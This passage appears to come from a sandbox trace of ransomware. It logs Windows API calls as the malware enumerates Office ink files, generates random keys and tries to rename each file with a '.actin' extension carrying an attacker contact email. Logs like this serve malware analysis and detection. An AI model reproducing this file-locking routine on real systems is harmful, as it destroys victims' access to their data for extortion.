shared\\ink\\inkdiv.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.951] SetEvent (hEvent=0x288) returned 1 [0146.951] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.951] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.952] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2018304) returned 1 [0146.952] CloseHandle (hObject=0x2e8) returned 1 [0146.952] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll")) returned 0x20 [0146.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0146.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll")) returned 0 [0146.953] SetEvent (hEvent=0x288) returned 1 [0146.953] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.953] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.953] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=367104) returned 1 [0146.953] CloseHandle (hObject=0x2e8) returned 1 [0146.953] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe")) returned 0x20 [0146.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InputPersonalization.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inputpersonalization.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.954] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.954] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.955] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2418) returned 1 [0146.955] CloseHandle (hObject=0x2e8) returned 1 [0146.955] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml")) returned 0x20 [0146.955] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.955] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.956] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.956] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.956] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2592) returned 1 [0146.956] CloseHandle (hObject=0x2e8) returned 1 [0146.956] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml")) returned 0x20 [0146.956] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.956] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscat.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscat.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.956] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.956] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.956] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2462) returned 1 [0146.956] CloseHandle (hObject=0x2e8) returned 1 [0146.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml")) returned 0x20 [0146.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipschs.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.957] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.957] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2436) returned 1 [0146.957] CloseHandle (hObject=0x2e8) returned 1 [0146.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml")) returned 0x20 [0146.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.957] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.961] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2556) returned 1 [0146.961] CloseHandle (hObject=0x2f4) returned 1 [0146.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml")) returned 0x20 [0146.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.961] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.961] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2514) returned 1 [0146.961] CloseHandle (hObject=0x2f4) returned 1 [0146.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml")) returned 0x20 [0146.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.962] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.962] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2616) returned 1 [0146.962] CloseHandle (hObject=0x2f4) returned 1 [0146.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml")) returned 0x20 [0146.962] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsdeu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdeu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.962] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.962] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2618) returned 1 [0146.963] CloseHandle (hObject=0x2f4) returned 1 [0146.963] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml")) returned 0x20 [0146.963] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.963] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.963] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.963] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.964] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2578) returned 1 [0146.964] CloseHandle (hObject=0x2f4) returned 1 [0146.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml")) returned 0x20 [0146.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.964] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.964] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.964] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.964] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3024) returned 1 [0146.964] CloseHandle (hObject=0x2f4) returned 1 [0146.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0x20 [0146.964] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.964] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.965] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.965] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.965] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2560) returned 1 [0146.965] CloseHandle (hObject=0x2f4) returned 1 [0146.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll")) returned 0x20 [0146.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.966] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.966] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2658) returned 1 [0146.966] CloseHandle (hObject=0x2f4) returned 1 [0146.966] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml")) returned 0x20 [0146.966] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.966] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.966] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2628) returned 1 [0146.967] CloseHandle (hObject=0x2f4) returned 1 [0146.967] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml")) returned 0x20 [0146.967] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.967] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.968] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2532) returned 1 [0146.968] CloseHandle (hObject=0x2f4) returned 1 [0146.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml")) returned 0x20 [0146.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.968] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.968] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2518) returned 1 [0146.968] CloseHandle (hObject=0x2f4) returned 1 [0146.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml")) returned 0x20 [0146.968] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.968] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.969] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), 